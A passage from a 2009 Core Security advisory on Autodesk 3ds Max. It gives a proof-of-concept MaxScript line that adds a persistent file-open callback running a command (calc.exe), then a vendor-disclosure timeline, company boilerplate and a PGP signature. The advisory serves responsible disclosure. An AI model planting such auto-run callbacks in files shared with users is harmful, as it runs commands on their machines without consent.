 A Proof of Concept file can be obtained by following these simple
 steps. Open Max, press F11 (MaxScript Listener), and paste this code:
 /-----
     callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")")
 id:#mbLoadCallback persistent:true  
 - -----/
 8. *Report Timeline*
 . 2009-08-25:
 Core Security Technologies ask the Autodesk Assistance Team for a
 security contact to report the vulnerability.
 . 2009-09-22:
 Core asks the Autodesk Assistance Team for a security contact to
 report the vulnerability.
 . 2009-10-09:
 Core contacts CERT to obtain security contact information for Autodesk.
 . 2009-10-16:
 CERT acknowledges the communication.
 . 2009-10-19:
 CERT sends their available contact information for Autodesk.
 . 2009-10-19:
 Core notifies Autodesk of the vulnerabilty report and announces its
 initial plan to publish the content on November 2nd, 2009. Core
 requests an acknoledgement within two working days and asks whehter
 the details should be sent encrypted or in plaintext.
 . 2009-10-19:
 Autodesk acknowledges the report and requests the information to be
 provided in encrypted form.
 . 2009-10-20:
 Core sends draft advisory and steps to reproduce the issue.
 . 2009-10-27:
 Core asks Autodesk about the status of the vulnerability report sent
 on October 20th, 2009.
 . 2009-10-27:
 Autodesk acknowledges the communication indicating that the pertinent
 Product Managers have been informed and are formulating a response.
 . 2009-11-06:
 Core notifies Autodesk about the missed deadline of November 2nd, 2009
 and reuqests an status update. Publication of CORE-2009-0909 is
 re-scheduled to November 16th, 2009 and is subject to change based on
 concrete feedback from Autodesk.
 . 2009-11-23:
 Given the lack of response from Autodesk, Core decides to publish the
 advisory CORE-2009-0909 as "user release".
 9. *References*
 [1] The author participated in Core Bugweek 2009 as member of the team
 "Gimbal Lock N Load".
 [2]
 http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112
 10. *About CoreLabs*
 CoreLabs, the research center of Core Security Technologies, is
 charged with anticipating the future needs and requirements for
 information security technologies. We conduct our research in several
 important areas of computer security including system vulnerabilities,
 cyber attack planning and simulation, source code auditing, and
 cryptography. Our results include problem formalization,
 identification of vulnerabilities, novel solutions and prototypes for
 new technologies. CoreLabs regularly publishes security advisories,
 technical papers, project information and shared software tools for
 public use at: http://www.coresecurity.com/corelabs.
 11. *About Core Security Technologies*
 Core Security Technologies develops strategic solutions that help
 security-conscious organizations worldwide develop and maintain a
 proactive process for securing their networks. The company's flagship
 product, CORE IMPACT, is the most comprehensive product for performing
 enterprise security assurance testing. CORE IMPACT evaluates network,
 endpoint and end-user vulnerabilities and identifies what resources
 are exposed. It enables organizations to determine if current security
 investments are detecting and preventing attacks. Core Security
 Technologies augments its leading technology solution with world-class
 security consulting services, including penetration testing and
 software security auditing. Based in Boston, MA and Buenos Aires,
 Argentina, Core Security Technologies can be reached at 617-399-6980
 or on the Web at http://www.coresecurity.com.
 12. *Disclaimer*
 The contents of this advisory are copyright (c) 2009 Core Security
 Technologies and (c) 2009 CoreLabs, and may be distributed freely
 provided that no fee is charged for this distribution and proper
 credit is given.
 13. *PGP/GPG Keys*
 This advisory has been signed with the GPG key of Core Security
 Technologies advisories team, which is available for download at
 http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v2.0.12 (MingW32)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN
 TPwAn1AMCamFLaX3gHyUys//tHcyhlvn
 =fPrL
 -----END PGP SIGNATURE-----